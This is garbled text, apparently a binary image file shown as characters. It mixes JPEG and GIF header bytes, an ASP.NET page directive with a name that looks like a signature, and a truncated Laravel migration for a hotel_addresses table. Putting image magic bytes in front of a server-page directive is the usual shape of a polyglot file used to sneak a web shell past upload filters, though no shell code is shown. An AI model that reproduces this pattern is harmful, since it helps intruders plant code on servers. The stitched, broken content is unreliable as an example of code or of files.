ÿØÿà JFIF    ÿÛ C     $.' ",#(7),01444'9=82<.342ÿÛ C  2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %> Mahdee Rajon
 ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- ÿØÿà JFIF    ÿÛ „  ( %!1!%*+...983,7(-.- id(); $table->unsignedBigInteger('hotel_id'); $table->string('street')->nullable(); $table->string('city')->nullable(); $table->string('country')->nullable(); $table->string('email')->nullable(); $table->string('phone')->nullable(); $table->string('website')->nullable(); $table->timestamps(); $table->foreign('hotel_id')->references('id')->on('hotels')->cascadeOnDelete(); }); } /** * Reverse the migrations. */ public function down(): void { // Schema::dropIfExists('hotel_addresses'); } };